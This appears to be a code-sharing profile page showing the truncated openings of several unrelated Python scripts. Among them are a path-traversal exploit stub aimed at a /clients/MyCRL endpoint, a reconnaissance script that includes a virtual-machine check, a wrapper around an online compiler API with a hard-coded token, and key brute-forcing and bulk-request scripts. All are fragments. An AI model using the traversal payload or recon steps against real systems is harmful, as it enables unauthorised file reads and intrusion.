This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import json | |
import time | |
def key_generator(): | |
key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
return ''.join(random.choice(key) for i in range(32)) | |
def key_vaildator(key): | |
try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import json | |
import argparse | |
parser = argparse.ArgumentParser() | |
def compile_code(lang, code): | |
api = "https://paiza.io:443/api/projects.json" | |
headers = {"Sec-Ch-Ua": "\"Not;A=Brand\";v=\"99\", \"Chromium\";v=\"106\"", "Accept": "application/json", "Content-Type": "application/json; charset=UTF-8", "X-Xsrf-Token": "\"mXfKR7uqZ6RaWov51f88QoL2VPVOYcLgKp1h7A0XVZPnw493XPMnyF/7oDVEr0MHny2sYcOtSq36l/Rl/L5Azg==\"", "Sec-Ch-Ua-Mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36", "Sec-Ch-Ua-Platform": "\"Windows\"", "Origin": "https://paiza.io", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://paiza.io/en/projects/new", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} | |
json = {"project": {"language": lang, "network": True, "output_type": None, "share": "private", "source_files": [{"body": code, "fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import asyncio | |
import multiprocessing | |
import threading | |
import time | |
import requests | |
import aiohttp | |
import psutil | |
from termcolor import colored | |
from tabulate import tabulate |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import os | |
import subprocess | |
import re | |
Instructions = [ | |
"Check system configuration", | |
"Check Current logged in user", | |
"Check if the system is running on a virtual machine", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import smtplib | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.base import MIMEBase | |
from email import encoders | |
import email.utils | |
import google.generativeai as genai | |
import argparse | |
import random | |
import requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from argparse import ArgumentParser | |
from urllib3.exceptions import InsecureRequestWarning | |
from colorama import Fore, Style | |
from concurrent.futures import ThreadPoolExecutor | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
def exploit(ip, path): | |
host = f'https://{ip}/clients/MyCRL' | |
data = f'aCSHELL/../../../../../../../../../../..{path}' |
OlderNewer